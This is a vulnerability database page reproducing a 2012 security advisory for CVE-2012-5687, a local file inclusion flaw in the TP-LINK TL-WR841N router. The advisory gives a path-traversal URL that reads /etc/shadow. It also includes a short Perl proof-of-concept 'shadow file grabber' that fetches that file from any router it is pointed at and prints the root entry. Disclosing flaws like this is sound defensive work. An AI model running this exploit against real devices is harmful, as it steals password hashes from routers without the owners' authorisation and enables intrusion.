Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMatan AzugiPACKETSTORM:117749
HistoryOct 29, 2012 - 12:00 a.m.

TP-LINK TL-WR841N Local File Inclusion

2012-10-2900:00:00
Matan Azugi
packetstormsecurity.com
36

EPSS

0.03

Percentile

90.9%

JSON
`=| Security Advisory - TP-LINK TL-WR841N LFI |=  
  
Issue: TL-WR841N 300Mbps Wireless N Router by "TP-LINK"  
Firmware Version: 3.13.9 Build 120201 Rel.54965n And Below versions  
Discovered Date: 24/10/2012  
CVE-ID: CVE-2012-5687  
Author: Matan Azugi [[email protected]] Product Vendor:  
http://www.tp-link.com/en/products/details/?model=TL-WR841N   
  
Details:  
  
TP-LINK TL-WR841N Wireless Router is prone to a Local File Inclusion(LFI)  
Vulnerability.  
The vulnerability exists in Web-Based Management. The URL parameter is not  
properly sanitized before being used.  
Exploitation URL:   
  
http://192.168.0.1/help/../../../../../../../../etc/shadow  
  
Successful exploitation allows viewing the router configuration and password  
files.  
  
Proof of Concept Code:   
  
#TP-LINK TL-WR841N Shadow file grabber#  
#built by Pulse [email protected]#  
#enjoy#  
  
use LWP::UserAgent;  
$host = $ARGV[0];  
chomp($host);  
if($host !~ /http:\/\//) { $host = "http://$host"; };  
  
my $ua = LWP::UserAgent->new;  
$ua->timeout(30);  
$lfi = "/help/../../../../../../../../etc/shadow";  
$url = $host.$lfi;  
$request = HTTP::Request->new('GET', $url); $response =  
$ua->request($request); my $html = $response->content; if($html =~ /root/) {  
print "root$' \n" ; }  
  
  
Thank You,  
Matan Azugi, MCSE OSCP  
http://www.madsec.co.il  
  
  
`

Related

cve 1
nvd 1
packetstorm 1
checkpoint_advisories 1
securityvulns 2
prion 1
cvelist 1
openvas 1
metasploit 1
exploitdb 1
cve
cve
CVE-2012-5687
2012-11-01 10:44:47
nvd
nvd
CVE-2012-5687
2012-11-01 10:44:47
packetstorm
packetstorm
TP-Link Wireless Lite N Access Point Directory Traversal
2024-09-01 00:00:00
checkpoint_advisories
checkpoint_advisories
TP-Link Wireless Lite N Access Point Directory Traversal (CVE-2012-5687)
2013-10-15 00:00:00
securityvulns
securityvulns
[BUGTRAQ]Security Advisory - TP-LINK TL-WR841N LFI - [UPDATE]
2012-11-01 00:00:00
TP-LINK TL-WR841N security vulnerabilities
2012-11-26 00:00:00
prion
prion
Directory traversal
2012-11-01 10:44:00
cvelist
cvelist
CVE-2012-5687
2012-11-01 10:00:00
openvas
openvas
TP-LINK TL-WR841N Router LFI Vulnerability (Oct 2012) - Active Check
2012-10-30 00:00:00
metasploit
metasploit
TP-Link Wireless Lite N Access Point Directory Traversal Vulnerability
2013-03-23 21:25:04
exploitdb
exploitdb
TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities
2013-02-15 00:00:00

EPSS

0.03

Percentile

90.9%

JSON
Related for PACKETSTORM:117749
cve1nvd1packetstorm1checkpoint_advisories1securityvulns2prion1cvelist1openvas1metasploit1exploitdb1